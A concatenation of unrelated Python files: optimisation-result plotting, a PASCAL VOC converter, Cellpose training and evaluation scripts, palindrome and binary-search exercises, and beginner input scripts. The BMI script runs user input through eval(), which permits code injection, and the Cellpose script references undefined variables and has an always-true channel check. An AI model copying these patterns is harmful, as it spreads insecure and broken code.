self.reevaluated_results[self.list_result_storage.index(res)][obj].append(val)
print('reevaluated_results: ', self.reevaluated_results)
def plot_distribution_for_objective(self, objective_str: str):
obj_index = self.objectives_str.index(objective_str)
fig, ax = plt.subplots(1, figsize=(10, 10))
for i in range(len(self.result_storage_names)):
sns.distplot(self.reevaluated_results[i][objective_str],
rug=True,
bins=max(1, len(self.reevaluated_results[i][objective_str]) // 10),
label=self.result_storage_names[i],
ax=ax)
ax.legend()
ax.set_title(objective_str.upper()+" distribution over test instances, for different optimisation approaches")
return fig
def print_test_distribution(self):
...
def get_best_by_objective_by_result_storage(self, objectif_str: str):
obj_index = self.objectives_str.index(objectif_str)
# print('obj_index: ', obj_index)
val = {}
for i in range(len(self.list_result_storage)):
fit_array = [self.list_result_storage[i].list_solution_fits[j][1].vector_fitness[obj_index]
for j in range(len(self.list_result_storage[i].list_solution_fits))] # create fit array
# self.objective_weights[obj_index] > 0:
if self.list_result_storage[i].maximize:
best_fit = max(fit_array)
else:
best_fit = min(fit_array)
# best_fit = max(fit_array)
best_index = fit_array.index(best_fit)
best_sol = self.list_result_storage[i].list_solution_fits[best_index]
# print('fit_array:', fit_array)
# print('best_sol:', best_sol)
val[self.result_storage_names[i]] = best_sol
return val
def generate_super_pareto(self):
sols = []
for rs in self.list_result_storage:
for s in rs.list_solution_fits:
sols.append(s)
rs = ResultStorage(list_solution_fits=sols, best_solution=None)
# print('len(rs): ', len(rs.list_solution_fits))
pareto_store = result_storage_to_pareto_front(result_storage=rs, problem=None)
# print('len(pareto_store): ', len(pareto_store.list_solution_fits))
# print('hhhh: ', [x[1].vector_fitness for x in pareto_store.list_solution_fits])
return pareto_store
def plot_all_2d_paretos_single_plot(self,
objectives_str=None):
if objectives_str is None:
objecives_names = self.objectives_str[:2]
objectives_index = [0,1]
else:
objecives_names = objectives_str
objectives_index = []
for obj in objectives_str:
obj_index = self.objectives_str.index(obj)
objectives_index.append(obj_index)
colors = cm.rainbow(np.linspace(0, 1, len(self.list_result_storage)))
fig, ax = plt.subplots(1)
ax.set_xlabel(objecives_names[0])
ax.set_ylabel(objecives_names[1])
for i in range(len(self.list_result_storage)):
ax.scatter(x=[p[1].vector_fitness[objectives_index[0]]
for p in self.list_result_storage[i].list_solution_fits],
y=[p[1].vector_fitness[objectives_index[1]]
for p in self.list_result_storage[i].list_solution_fits],
color=colors[i])
ax.legend(self.result_storage_names)
return ax
def plot_all_2d_paretos_subplots(self, objectives_str=None):
if objectives_str is None:
objecives_names = self.objectives_str[:2]
objectives_index = [0, 1]
else:
objecives_names = objectives_str
objectives_index = []
for obj in objectives_str:
obj_index = self.objectives_str.index(obj)
objectives_index.append(obj_index)
cols = 2
rows = math.ceil(len(self.list_result_storage) / cols) # I have to do this to ensure at least 2 rows or else it creates axs with only 1 diumension and it crashes
fig, axs = plt.subplots(rows, cols)
axis = axs.flatten()
colors = cm.rainbow(np.linspace(0, 1, len(self.list_result_storage)))
print(axs.shape)
for i, ax in zip(range(len(self.list_result_storage)), axis[:len(self.list_result_storage)]):
x = [p[1].vector_fitness[objectives_index[0]]
for p in self.list_result_storage[i].list_solution_fits]
y = [p[1].vector_fitness[objectives_index[1]]
for p in self.list_result_storage[i].list_solution_fits]
ax.scatter(x=x,
y=y,
color=colors[i])
ax.set_title(self.result_storage_names[i])
fig.tight_layout(pad=3.0)
return fig
def plot_super_pareto(self):
super_pareto = self.generate_super_pareto()
# plot_storage_2d(result_storage=super_pareto, name_axis=self.objectives_str)
plot_pareto_2d(pareto_front=super_pareto, name_axis=self.objectives_str)
# TODO: This one is not working ! Need to check why
plt.title('Pareto front obtained by merging solutions from all result stores')
def plot_all_best_by_objective(self, objectif_str):
obj_index = self.objectives_str.index(objectif_str)
data = self.get_best_by_objective_by_result_storage(objectif_str)
x = list(data.keys())
y = [data[key][1].vector_fitness[obj_index] for key in x]
# print('x: ', x)
# print('y: ', y)
y_pos = np.arange(len(x))
plt.bar(y_pos, y)
plt.xticks(y_pos, x, rotation=45)
plt.title('Comparison on ' + objectif_str)
# plt.show()
|
weight = eval(input("Input you weight in KG\n"))
height = eval(input("Input you Height in CM\n"))
BMI = (weight/(height*height))
print("Your BMI is =", BMI) |
class Habit:
def __init__(self, name, quota , period):
self.name = name
self.quota = quota
self.period = period
def __repr__(self):
return "Habit('{}', '{}', {})".format(self.name, self.quota, self.period) |
"""Convert raw PASCAL VOC dataset to TFRecord for object detection.
The Example proto contains the following fields:
image/encoded: string, containing JPEG image in RGB colorspace
image/height: integer, image height in pixels
image/width: integer, image width in pixels
image/format: string, specifying the format, like 'JPEG'
image/object/bbox/xmin: list of float specifying the bboxes.
image/object/bbox/xmax: list of float specifying the bboxes.
image/object/bbox/ymin: list of float specifying the bboxes.
image/object/bbox/ymax: list of float specifying the bboxes.
image/object/bbox/label: list of integer specifying the classification index.
"""
import os
import sys
import random
import numpy as np
import tensorflow as tf
from xml.etree import ElementTree
from utils.dataset_util import write_label_file
from datasets.pascal2012 import VOC_LABELS, SPLIT_TO_SIZES
from utils.dataset_util import int64_list_feature, bytes_list_feature, float_list_feature, \
bytes_feature, int64_feature
DIRECTORY_ANNOTATIONS = 'Annotations/'
DIRECTORY_IMAGES = 'JPEGImages/'
# The number of images(total 17125) in the validation set.
_NUM_VALIDATION = SPLIT_TO_SIZES['validation']
# Seed for repeatability
_RANDOM_SEED = 123
FLAGS = tf.app.flags.FLAGS
tf.app.flags.DEFINE_string('dataset_dir', '', 'The dataset directory where the dataset is stored.')
tf.app.flags.DEFINE_string('meta_directory', '', 'The directory containing images and annotations dir')
def _image_to_tfexample(image_name, annotation_name):
"""Generate a tf example by image and annotation file."""
image_data = tf.gfile.FastGFile(image_name, 'rb').read()
tree = ElementTree.parse(annotation_name)
root = tree.getroot()
# image shape
size = root.find('size')
height = int(size.find('height').text)
width = int(size.find('width').text)
channels = int(size.find('depth').text)
# image annotations
xmin = []
xmax = []
ymin = []
ymax = []
labels = []
labels_text = []
difficult = []
truncated = []
for obj in root.findall('object'):
label_name = obj.find('name').text
labels.append(int(VOC_LABELS[label_name][0]))
labels_text.append(label_name.encode('ascii'))
if obj.find('difficult'):
difficult.append(int(obj.find('difficult').text))
else:
difficult.append(0)
if obj.find('truncated'):
truncated.append(int(obj.find('truncated').text))
else:
truncated.append(0)
bbox = obj.find('bndbox')
xmin.append(float(bbox.find('xmin').text) / width)
xmax.append(float(bbox.find('xmax').text) / width)
ymin.append(float(bbox.find('ymin').text) / height)
ymax.append(float(bbox.find('ymax').text) / height)
example = tf.train.Example(features=tf.train.Features(feature={
'image/encoded': bytes_feature(image_data),
'image/format': bytes_feature(b'JPEG'),
'image/height': int64_feature(height),
'image/width': int64_feature(width),
'image/channels': int64_feature(channels),
'image/object/bbox/xmin': float_list_feature(xmin),
'image/object/bbox/xmax': float_list_feature(xmax),
'image/object/bbox/ymin': float_list_feature(ymin),
'image/object/bbox/ymax': float_list_feature(ymax),
'image/object/bbox/label': int64_list_feature(labels),
'image/object/bbox/text': bytes_list_feature(labels_text),
'image/object/bbox/difficult': int64_list_feature(difficult),
'image/object/bbox/truncated': int64_list_feature(truncated),
}))
return example
def _get_dataset_name(dataset_dir, split_name):
output_filename = 'data_%s.tfrecord' % split_name
return os.path.join(dataset_dir, output_filename)
def _dataset_exist(dataset_dir):
for split_name in ['train', 'validation']:
output_filename = _get_dataset_name(dataset_dir, split_name)
if not tf.gfile.Exists(output_filename):
return False
return True
def _get_filenames(dataset_dir):
meta_names = []
image_dir = os.path.join(dataset_dir, DIRECTORY_IMAGES)
for filename in os.listdir(image_dir):
meta_names.append(filename[:-4])
return meta_names
def _convert_dataset(split_name, filenames, dataset_dir, meta_dir):
"""Convert the given filenames to a TFRecord dataset."""
assert split_name in ['train', 'validation']
output_filename = _get_dataset_name(dataset_dir, split_name)
with tf.python_io.TFRecordWriter(output_filename) as tfrecord_writer:
for i in range(len(filenames)):
sys.stdout.write('\r>> Converting image %d/%d to %s dataset.' % (i+1, len(filenames), split_name))
sys.stdout.flush()
imagename = os.path.join(meta_dir, DIRECTORY_IMAGES, filenames[i] + '.jpg')
anotname = os.path.join(meta_dir, DIRECTORY_ANNOTATIONS, filenames[i] + '.xml')
if tf.gfile.Exists(imagename) and tf.gfile.Exists(anotname):
example = _image_to_tfexample(imagename, anotname)
tfrecord_writer.write(example.SerializeToString())
sys.stdout.write('\n')
sys.stdout.flush()
def main(_):
"""Run the conversion operation."""
if not tf.gfile.Exists(FLAGS.dataset_dir):
tf.gfile.MakeDirs(FLAGS.dataset_dir)
if _dataset_exist(FLAGS.dataset_dir):
print('Dataset files already exist. Existing without recreate files.')
return
classes_id_to_name = {value[0]: key for key, value in VOC_LABELS.items()}
meta_filenames = _get_filenames(FLAGS.meta_directory)
# Divide into training and validation
random.seed()
random.shuffle(meta_filenames)
train_filenames = meta_filenames[_NUM_VALIDATION:]
validation_filenames = meta_filenames[:_NUM_VALIDATION]
# convert the training and validation
_convert_dataset('train', train_filenames, FLAGS.dataset_dir, FLAGS.meta_directory)
_convert_dataset('validation', validation_filenames, FLAGS.dataset_dir, FLAGS.meta_directory)
# write the labels file
write_label_file(classes_id_to_name, FLAGS.dataset_dir)
print('\nFinished converting the PASCAL VOC dataset.')
if __name__ == '__main__':
tf.app.run()
|
"""
Copright © 2023 Howard Hughes Medical Institute, Authored by Carsen Stringer and Marius Pachitariu.
"""
import sys, os, time, string, shutil
from natsort import natsorted
from glob import glob
from pathlib import Path
import numpy as np
import matplotlib.pyplot as plt
import mxnet as mx
import matplotlib.pyplot as plt
from matplotlib import rc
import cv2
from scipy import stats
from cellpose import models, datasets, utils, transforms, io, metrics
thresholds = np.arange(0.5, 1.05, 0.05)
def get_pretrained_models(model_root, unet=0, nclass=3, residual=1, style=1, concatenate=0):
sstr = ['off', 'on']
model_str = model_root
if unet:
model_str += 'unet' + str(nclass)
else:
model_str += 'cellpose'
model_str += '_residual_' + sstr[residual]
model_str += '_style_' + sstr[style]
model_str += '_concatenation_' + sstr[concatenate]
model_paths = natsorted(glob(model_str + '*'))
removed_npy = [x for x in model_paths if not x.endswith('.npy')]
model_paths = removed_npy
return model_paths
def make_kfold_data(data_root):
""" uses cellpose images and splits into 9 folds """
ntest=68
ntrain=540
train_root = os.path.join(data_root, 'train/')
imgs = [os.path.join(train_root, '%03d_img.tif'%i) for i in range(ntrain)]
labels = [os.path.join(train_root, '%03d_masks.tif'%i) for i in range(ntrain)]
flow_labels = [os.path.join(train_root, '%03d_img_flows.tif'%i) for i in range(ntrain)]
test_root = os.path.join(data_root, 'test/')
imgs = [os.path.join(test_root, '%03d_img.tif'%i) for i in range(ntest)]
labels = [os.path.join(test_root, '%03d_masks.tif'%i) for i in range(ntest)]
flow_labels = [os.path.join(test_root, '%03d_img_flows.tif'%i) for i in range(ntest)]
all_inds = np.hstack((np.random.permutation(ntrain), np.random.permutation(ntest)+ntrain))
for j in range(9):
root_train = os.path.join(data_root, 'train%d/'%j)
root_test = os.path.join(data_root, 'test%d/'%j)
os.makedirs(root_train, exist_ok=True)
os.makedirs(root_test, exist_ok=True)
train_inds = all_inds[np.arange(j*ntest, j*ntest+ntrain, 1, int)%ntot]
test_inds = all_inds[np.arange(j*ntest+ntrain, (j+1)*ntest+ntrain, 1, int)%ntot]
for i,ind in enumerate(train_inds):
shutil.copyfile(imgs[ind], os.path.join(root_train, '%03d_img.tif'%i))
shutil.copyfile(labels[ind], os.path.join(root_train, '%03d_masks.tif'%i))
shutil.copyfile(flow_labels[ind], os.path.join(root_train, '%03d_img_flows.tif'%i))
for i,ind in enumerate(test_inds):
shutil.copyfile(imgs[ind], os.path.join(root_test, '%03d_img.tif'%i))
shutil.copyfile(labels[ind], os.path.join(root_test, '%03d_masks.tif'%i))
shutil.copyfile(flow_labels[ind], os.path.join(root_test, '%03d_img_flows.tif'%i))
def train_unets(data_root):
""" train unets with 3 or 2 classes and different architectures (12 networks total) """
# can also run on command line for GPU cluster
# python -m cellpose --train --use_gpu --dir images_cyto/train/ --test_dir images_cyto/test/ --img_filter _img --pretrained_model None --chan 2 --chan2 1 --unet "$1" --nclasses "$2" --learning_rate "$3" --residual_on "$4" --style_on "$5" --concatenation "$6"
device = mx.gpu()
ntest = len(glob(os.path.join(data_root, 'test/*_img.tif')))
ntrain = len(glob(os.path.join(data_root, 'train/*_img.tif')))
channels = [2,1]
concatenation = [1, 1, 0]
residual_on = [0, 0, 1]
style_on = [0, 0, 1]
nclasses = [3, 2, 3]
# load images
train_root = os.path.join(data_root, 'train/')
train_data = [io.imread(os.path.join(train_root, '%03d_img.tif'%i)) for i in range(ntrain)]
train_labels = [io.imread(os.path.join(train_root, '%03d_masks.tif'%i)) for i in range(ntrain)]
test_root = os.path.join(data_root, 'test/')
test_data = [io.imread(os.path.join(test_root, '%03d_img.tif'%i)) for i in range(ntest)]
test_labels = [io.imread(os.path.join(test_root, '%03d_masks.tif'%i)) for i in range(ntest)]
# train networks
for k in range(len(concatenation)):
# 4 nets for each
for l in range(4):
model = models.UnetModel(device=device,
pretrained_model=None,
diam_mean=30,
residual_on=residual_on[k],
style_on=style_on[k],
concatenation=concatenation[k],
nclasses=nclasses[k])
model.train(train_data, train_labels, test_data, test_labels,
channels=channels, rescale=True,
save_path=train_root)
def test_unets_main(data_root, save_root):
""" data_root is folder with folders images_.../train/models/, images_cyto/test and images_nuclei/test """
#model_types = ['cyto', 'cyto_sp', 'nuclei']
model_types = ['cyto_sp', 'nuclei']
for model_type in model_types:
model_root = os.path.join(data_root, 'images_%s/train/models/'%model_type)
test_root = os.path.join(data_root, 'images_%s/test/'%model_type.split('_')[0])
test_unets(model_root, test_root, save_root, model_type)
def test_unets(model_root, test_root, save_root, model_type='cyto'):
""" test trained unets """
device=mx.gpu()
ntest = len(glob(os.path.join(test_root, '*_img.tif')))
if model_type[:4]=='cyto':
channels = [2,1]
else:
channels = [0,0]
concatenation = [1, 1, 0]
residual_on = [0, 0, 1]
style_on = [0, 0, 1]
nclasses = [3, 2, 3]
sstr = ['off', 'on']
aps = np.zeros((len(concatenation),ntest,len(thresholds)))
test_data = [io.imread(os.path.join(test_root, '%03d_img.tif'%i)) for i in range(ntest)]
test_labels = [io.imread(os.path.join(test_root, '%03d_masks.tif'%i)) for i in range(ntest)]
if model_type!='cyto_sp':
dat = np.load(os.path.join(test_root, 'predicted_diams.npy'), allow_pickle=True).item()
if model_type=='cyto':
rescale = 30. / dat['predicted_diams']
else:
rescale = 17. / dat['predicted_diams']
else:
rescale = np.ones(len(test_data))
for k in range(1):#len(concatenation)):
pretrained_models = get_pretrained_models(model_root, 1, nclasses[k],
residual_on[k], style_on[k],
concatenation[k])
print(pretrained_models)
model = models.UnetModel(device=device,
pretrained_model=pretrained_models)
masks = model.eval(test_data, channels=channels, rescale=rescale, net_avg=True)[0]
ap = metrics.average_precision(test_labels, masks,
threshold=thresholds)[0]
print(ap[:,[0,5,8]].mean(axis=0))
aps[k] = ap
np.save(os.path.join(save_root,
'unet%d_residual_%s_style_%s_concatenation_%s_%s_masks.npy'%(nclasses[k], sstr[residual_on[k]],
sstr[style_on[k]], sstr[concatenation[k]], model_type)),
masks)
def train_cellpose_nets(data_root):
""" train networks on 9-folds of data (180 networks total) ... ~1 week on one GPU """
# can also run on command line for GPU cluster
# python -m cellpose --train --use_gpu --dir images_cyto/train"$7"/ --test_dir images_cyto/test"$7"/ --img_filter _img --pretrained_model None --chan 2 --chan2 1 --unet "$1" --nclasses "$2" --learning_rate "$3" --residual_on "$4" --style_on "$5" --concatenation "$6"
device = mx.gpu()
ntest=68
ntrain=540
concatenation = [0, 0, 0, 1, 1]
residual_on = [1, 1, 0, 1, 0]
style_on = [1, 0, 1, 1, 0]
channels = [2,1]
for j in range(9):
# load images
train_root = os.path.join(data_root, 'train%d/'%j)
train_data = [io.imread(os.path.join(train_root, '%03d_img.tif'%i)) for i in range(ntrain)]
train_labels = [io.imread(os.path.join(train_root, '%03d_masks.tif'%i)) for i in range(ntrain)]
train_flow_labels = [io.imread(os.path.join(train_root, '%03d_img_flows.tif'%i)) for i in range(ntrain)]
train_labels = [np.concatenate((train_labels[i][np.newaxis,:,:], train_flow_labels), axis=0)
for i in range(ntrain)]
test_root = os.path.join(data_root, 'test%d/'%j)
test_data = [io.imread(os.path.join(test_root, '%03d_img.tif'%i)) for i in range(ntest)]
test_labels = [io.imread(os.path.join(test_root, '%03d_masks.tif'%i)) for i in range(ntest)]
test_flow_labels = [io.imread(os.path.join(test_root, '%03d_img_flows.tif'%i)) for i in range(ntest)]
test_labels = [np.concatenate((test_labels[i][np.newaxis,:,:], test_flow_labels), axis=0)
for i in range(ntest)]
# train networks
for k in range(len(concatenation)):
# 4 nets for each
for l in range(4):
model = models.CellposeModel(device=device,
pretrained_model=None,
diam_mean=30,
residual_on=residual_on[k],
style_on=style_on[k],
concatenation=concatenation[k])
model.train(images, labels, test_data=test_images, test_labels=test_labels,
channels=channels, rescale=True,
save_path=train_root)
# train size network on default network once
if k==0 and l==0:
sz_model = models.SizeModel(model, device=device)
sz_model.train(train_data, train_labels, test_data, test_labels, channels=channels)
predicted_diams, diams_style = sz_model.eval(test_data, channels=channels)
tlabels = [lbl[0] for lbl in test_labels]
ccs = np.corrcoef(diams_style, np.array([utils.diameters(lbl)[0] for lbl in tlabels]))[0,1]
cc = np.corrcoef(predicted_diams, np.array([utils.diameters(lbl)[0] for lbl in tlabels]))[0,1]
print('style test correlation: %0.4f; final test correlation: %0.4f'%(ccs,cc))
np.save(os.path.join(test_root, 'predicted_diams.npy'),
{'predicted_diams': predicted_diams, 'diams_style': diams_style})
def test_cellpose_main(data_root, save_root):
""" data_root is folder with folders images_cyto_sp/train/models/, images_cyto/test and images_nuclei/test """
#model_types = ['cyto', 'cyto_sp', 'nuclei']
model_types = ['nuclei']
for model_type in model_types:
if model_type=='cyto' or model_type=='nuclei':
pretrained_models = [str(Path.home().joinpath('.cellpose/models/%s_%d'%(model_type,j))) for j in range(4)]
else:
pretrained_models = glob(os.path.join(data_root, 'images_cyto_sp/train/models/cellpose_*'))
test_root = os.path.join(data_root, 'images_%s/test/'%model_type.split('_')[0])
print(test_root, pretrained_models)
test_cellpose(test_root, save_root, pretrained_models, model_type)
def test_timing(test_root, save_root):
itest=14
test_data = io.imread(os.path.join(test_root, '%03d_img.tif'%itest))
dat = np.load(os.path.join(test_root, 'predicted_diams.npy'), allow_pickle=True).item()
rescale = 30. / dat['predicted_diams'][itest]
Ly, Lx = test_data.shape[1:]
test_data = cv2.resize(np.transpose(test_data, (1,2,0)), (int(Lx*rescale), int(Ly*rescale)))
devices = [mx.gpu(), mx.cpu()]
bsize = [256, 512, 1024]
t100 = np.zeros((2,3,2))
for d,device in enumerate(devices):
model = models.CellposeModel(device=device, pretrained_model=None)
for j in range(3):
if j==2:
test_data = np.tile(test_data, (2,2,1))
img = test_data[:bsize[j], :bsize[j]]
imgs = [img for i in range(100)]
for k in [0,1]:
tic = time.time()
masks = model.eval(imgs, channels=[2,1], rescale=1.0, net_avg=k)[0]
print(masks[0].max())
t100[d,j,k] = time.time()-tic
print(t100[d,j,k])
def test_cellpose(test_root, save_root, pretrained_models, diam_file=None, model_type='cyto'):
""" test single cellpose net or 4 nets averaged """
device = mx.gpu()
ntest = len(glob(os.path.join(test_root, '*_img.tif')))
if model_type[:4]!='nuclei':
channels = [2,1]
else:
channels = [0,0]
test_data = [io.imread(os.path.join(test_root, '%03d_img.tif'%i)) for i in range(ntest)]
# saved diameters
if model_type != 'cyto_sp':
if diam_file is None:
dat = np.load(os.path.join(test_root, 'predicted_diams.npy'), allow_pickle=True).item()
else:
dat = np.load(diam_file, allow_pickle=True).item()
if model_type=='cyto':
rescale = 30. / dat['predicted_diams']
else:
rescale = 17. / dat['predicted_diams']
else:
rescale = np.ones(len(test_data))
model = models.CellposeModel(device=device, pretrained_model=pretrained_models)
masks = model.eval(test_data, channels=channels, rescale=rescale)[0]
np.save(os.path.join(save_root, 'cellpose_%s_masks.npy'%model_type), masks)
def test_nets_3D(stack, model_root, save_root, test_region=None):
""" input 3D stack and test_region (where ground truth is labelled) """
device = mx.gpu()
model_archs = ['unet3']#, 'unet2', 'cellpose']
# found thresholds using ground truth
cell_thresholds = [3., 0.25]
boundary_thresholds = [0., 0.]
for m,model_arch in enumerate(model_archs):
if model_arch=='cellpose':
pretrained_models = [str(Path.home().joinpath('.cellpose/models/cyto_%d'%j)) for j in range(4)]
model = models.CellposeModel(device=device, pretrained_model=pretrained_models)
masks = model.eval(stack, channels=[2,1], rescale=30./25.,
do_3D=True, min_size=2000)[0]
else:
pretrained_models = get_pretrained_models(model_root, unet=1, nclass=int(model_arch[-1]),
residual=0, style=0, concatenate=1)
model = models.UnetModel(device=device, pretrained_model=pretrained_models)
masks = model.eval(stack, channels=[2,1], rescale=30./25.,
do_3D=True, min_size=2000, cell_threshold=cell_thresholds[m],
boundary_threshold=boundary_thresholds[m])[0]
if test_region is not None:
masks = masks[test_region]
masks = utils.fill_holes_and_remove_small_masks(masks, min_size=2000)
np.save(os.path.join(save_root, '%s_3D_masks.npy'%model_arch), masks)
def test_cellpose_kfold_aug(data_root, save_root):
""" test trained cellpose networks on all cyto images """
device = mx.gpu()
ntest = 68
concatenation = [0]
residual_on = [1]
style_on = [1]
channels = [2,1]
aps = np.zeros((9,68,len(thresholds)))
for j in range(9):
train_root = os.path.join(data_root, 'train%d/'%j)
model_root = os.path.join(train_root, 'models/')
test_root = os.path.join(data_root, 'test%d/'%j)
test_data = [io.imread(os.path.join(test_root, '%03d_img.tif'%i)) for i in range(ntest)]
test_labels = [io.imread(os.path.join(test_root, '%03d_masks.tif'%i)) for i in range(ntest)]
k=0
pretrained_models = get_pretrained_models(model_root, 0, 3,
residual_on[k], style_on[k],
concatenation[k])
print(pretrained_models)
cp_model = models.CellposeModel(device=device,
pretrained_model=pretrained_models)
dat = np.load(test_root+'predicted_diams.npy', allow_pickle=True).item()
rescale = 30. / dat['predicted_diams']
masks = cp_model.eval(test_data, channels=channels, rescale=rescale, net_avg=True, augment=True)[0]
ap = metrics.average_precision(test_labels, masks,
threshold=thresholds)[0]
print(ap[:,[0,5,8]].mean(axis=0))
aps[j] = ap
return aps
def test_cellpose_kfold(data_root, save_root):
""" test trained cellpose networks on all cyto images """
device = mx.gpu()
ntest = 68
concatenation = [0, 0, 0, 1, 1]
residual_on = [1, 1, 0, 1, 0]
style_on = [1, 0, 1, 1, 0]
channels = [2,1]
aps = np.zeros((9,9,68,len(thresholds)))
for j in range(9):
train_root = os.path.join(data_root, 'train%d/'%j)
model_root = os.path.join(train_root, 'models/')
test_root = os.path.join(data_root, 'test%d/'%j)
test_data = [io.imread(os.path.join(test_root, '%03d_img.tif'%i)) for i in range(ntest)]
test_labels = [io.imread(os.path.join(test_root, '%03d_masks.tif'%i)) for i in range(ntest)]
for k in range(len(concatenation)):
pretrained_models = get_pretrained_models(model_root, 0, 3,
residual_on[k], style_on[k],
concatenation[k])
print(pretrained_models)
cp_model = models.CellposeModel(device=device,
pretrained_model=pretrained_models)
dat = np.load(test_root+'predicted_diams.npy', allow_pickle=True).item()
rescale = 30. / dat['predicted_diams']
masks = cp_model.eval(test_data, channels=channels, rescale=rescale, net_avg=True, augment=False)[0]
ap = metrics.average_precision(test_labels, masks,
threshold=thresholds)[0]
print(ap[:,[0,5,8]].mean(axis=0))
aps[j,k] = ap
if k==0:
# run single network
for m, pretrained_model in enumerate(pretrained_models):
cp_model = models.CellposeModel(device=device,
pretrained_model=pretrained_model)
masks = cp_model.eval(test_data, channels=channels, rescale=rescale, net_avg=False, augment=False)[0]
ap = metrics.average_precision(test_labels, masks,
threshold=thresholds)[0]
print(ap[:,[0,5,8]].mean(axis=0))
aps[j,m+5] = ap
np.save(os.path.join(save_root, 'ap_cellpose_all.npy'), aps)
def size_distributions(data_root, save_root):
""" size distributions for all images """
ntest = 68
sz_dist = np.zeros((9,ntest))
for j in range(9):
test_root = os.path.join(data_root, 'test%d/'%j)
test_labels = [io.imread(os.path.join(test_root, '%03d_masks.tif'%i)) for i in range(ntest)]
sz_dist[j] = np.array([utils.size_distribution(lbl) for lbl in test_labels])
np.save(os.path.join(save_root, 'size_distribution.npy'), sz_dist)
return sz_dist
|
#!/usr/bin/env python
from __future__ import (absolute_import, division, print_function, unicode_literals)
s = raw_input("Please eneter a string: ")
z = [x for x in s]
z.reverse()
if s == "".join(z):
print ("The string is a palindrome")
else:
print( "The string is not a palindrome")
|
#使用deque判断回文数
from pythonds.basic.deque import Deque
def fixhwnum(string):
numlist=[num for num in string]
qe=Deque()
for i in numlist:
qe.addFront(i)
while qe.size()>1:
if qe.removeFront()!=qe.removeRear():
return False
return True
print(fixhwnum('abcdcba'))
print(fixhwnum('afdefdfa')) |
class Solution:
def search(self, nums: List[int], target: int) -> int:
left , right = 0, len(nums) -1
while left <= right:
middle = int((left + right) /2)
if nums[middle] == target:
return middle
else:
if nums[middle] < nums[right]:
if nums[middle] < target and nums[right] >= target:
left = middle + 1
else:
right = middle - 1
else:
if nums[left] <= target and nums[middle] > target:
right = middle - 1
else:
left = middle + 1
return -1
"""
二分搜索法的关键在于获得了中间数后,判断下面要搜索左半段还是右半段,
我们可以观察出规律,如果中间的数小于最右边的数,则右半段是有序的,若中间数大于最右边数,则左半段是有序的,
我们只要在有序的半段里用首尾两个数组来判断目标值是否在这一区域内,这样就可以确定保留哪半边了,
""" |
#
# Copyright (c) 2022, Gabriel Linder <linder.gabriel@gmail.com>
#
# Permission to use, copy, modify, and/or distribute this software for any
# purpose with or without fee is hereby granted, provided that the above
# copyright notice and this permission notice appear in all copies.
#
# THE SOFTWARE IS PROVIDED "AS IS" AND THE AUTHOR DISCLAIMS ALL WARRANTIES WITH
# REGARD TO THIS SOFTWARE INCLUDING ALL IMPLIED WARRANTIES OF MERCHANTABILITY
# AND FITNESS. IN NO EVENT SHALL THE AUTHOR BE LIABLE FOR ANY SPECIAL, DIRECT,
# INDIRECT, OR CONSEQUENTIAL DAMAGES OR ANY DAMAGES WHATSOEVER RESULTING FROM
# LOSS OF USE, DATA OR PROFITS, WHETHER IN AN ACTION OF CONTRACT, NEGLIGENCE OR
# OTHER TORTIOUS ACTION, ARISING OUT OF OR IN CONNECTION WITH THE USE OR
# PERFORMANCE OF THIS SOFTWARE.
#
from dargor.coalesce import coalesce
def div(a: int, b: int) -> float:
return a / b
def test_ok() -> None:
assert coalesce(42, div, 13, 1) == 13
def test_ko() -> None:
assert coalesce(42, div, 13, 0) == 42
|
scores = [ ]
for i in range(5) :
value = int( input("성적입력 : ") )
scores.append(value)
print(scores) # 입력 받은 리스트 출력
sum = 0
for i in range(5) :
sum += scores[i]
print("합계: ", sum)
print("평균: ", (sum/5))
|
# -*- coding: utf-8 -*-
"""
Created on Thu Jul 29 23:44:31 2021
@author: -
"""
# -- coding:utf-8 --
import pandas as pd
import numpy as np
import os
from os.path import join as pjoin
# from utils import is_number
import matplotlib.pyplot as plt
import seaborn as sns
import warnings
import xgboost as xgb
from sklearn.model_selection import StratifiedKFold
from sklearn.model_selection import train_test_split
from sklearn.metrics import f1_score
from matplotlib import pyplot as plt
from matplotlib.colors import ListedColormap
from imblearn.over_sampling import SMOTE
#Impute Libraries
from sklearn.impute import KNNImputer
from sklearn.experimental import enable_iterative_imputer # noqa
from sklearn.impute import IterativeImputer as MICE
from sklearn import metrics
from sklearn.metrics import classification_report
from sklearn import preprocessing
from sklearn.pipeline import Pipeline
from sklearn.impute import SimpleImputer
import xgboost as xgb
from sklearn.discriminant_analysis import LinearDiscriminantAnalysis
from sklearn.neural_network import MLPClassifier
from sklearn.metrics import classification_report,confusion_matrix
#Import SVM
from sklearn.svm import SVC
#Import library for logistic regression
from sklearn.linear_model import LogisticRegression
from sklearn.ensemble import VotingClassifier
from sklearn.metrics import classification_report,confusion_matrix
from sklearn.ensemble import VotingClassifier
from sklearn.neighbors import KNeighborsClassifier
from sklearn.metrics import roc_curve,auc
from sklearn.model_selection import KFold
from sklearn.model_selection import cross_val_predict
import numpy as np
from sklearn.model_selection import cross_val_score
from sklearn import metrics
from sklearn.metrics import recall_score
from sklearn.metrics import make_scorer
from sklearn.linear_model import LogisticRegression
from sklearn.metrics import precision_score,accuracy_score
from sklearn.metrics import f1_score
import numpy as np
from math import *
from sklearn.model_selection import cross_val_score
from sklearn import metrics
from sklearn.metrics import recall_score
from sklearn.metrics import accuracy_score
from sklearn.metrics import make_scorer
from sklearn.linear_model import LogisticRegression
from sklearn.metrics import precision_score,accuracy_score
from sklearn.metrics import f1_score
from sklearn import preprocessing
from imblearn.over_sampling import RandomOverSampler
from imblearn.over_sampling import SMOTE
from sklearn.metrics import confusion_matrix
from sklearn.ensemble import RandomForestClassifier, GradientBoostingClassifier #RandomForestRegressor
from sklearn.ensemble import ExtraTreesClassifier
import xgboost as xgb
from sklearn.discriminant_analysis import LinearDiscriminantAnalysis
from sklearn.neural_network import MLPClassifier
from sklearn.linear_model import LogisticRegression
from sklearn.svm import SVC
from sklearn.model_selection import cross_val_predict
from sklearn.preprocessing import MinMaxScaler
from sklearn.linear_model import LogisticRegression
from sklearn.neighbors import KNeighborsClassifier
from sklearn.tree import DecisionTreeClassifier
from sklearn.ensemble import AdaBoostClassifier
from sklearn.metrics import classification_report,confusion_matrix
from sklearn.ensemble import VotingClassifier
import numpy as np
from sklearn.model_selection import cross_val_score
from sklearn import metrics
from sklearn.metrics import recall_score
from sklearn.metrics import accuracy_score
from sklearn.metrics import make_scorer
from sklearn.metrics import precision_score,accuracy_score
from sklearn.metrics import f1_score
from sklearn import preprocessing
lb = preprocessing.LabelBinarizer()
from imblearn.over_sampling import SMOTE
from sklearn.model_selection import StratifiedKFold
